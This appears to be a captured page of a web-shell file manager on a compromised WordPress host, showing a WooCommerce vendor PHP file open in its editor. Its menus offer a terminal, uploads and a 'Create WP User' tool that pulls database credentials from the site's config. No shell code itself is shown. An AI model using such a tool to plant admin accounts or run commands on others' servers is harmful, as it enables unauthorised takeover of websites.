Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.125
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
woocommerce
/
lib
/
packages
/
Sabberworm
/
CSS
/
Position
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
Position.php
1.42 KB
-rw-r--r--
2026-03-03 00:17
Positionable.php
1.20 KB
-rw-r--r--
2026-03-03 00:17
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
Positionable.php
<?php declare(strict_types=1); namespace Automattic\WooCommerce\Vendor\Sabberworm\CSS\Position; /** * Represents a CSS item that may have a position in the source CSS document (line number and possibly column number). * * A standard implementation of this interface is available in the `Position` trait. */ interface Positionable { /** * @return int<1, max>|null */ public function getLineNumber(); /** * @return int<0, max> * * @deprecated in version 8.9.0, will be removed in v9.0. Use `getLineNumber()` instead. */ public function getLineNo(); /** * @return int<0, max>|null */ public function getColumnNumber(); /** * @return int<0, max> * * @deprecated in version 8.9.0, will be removed in v9.0. Use `getColumnNumber()` instead. */ public function getColNo(); /** * @param int<0, max>|null $lineNumber * Providing zero for this parameter is deprecated in version 8.9.0, and will not be supported from v9.0. * Use `null` instead when no line number is available. * @param int<0, max>|null $columnNumber */ public function setPosition($lineNumber, $columnNumber = null); }
关闭
保存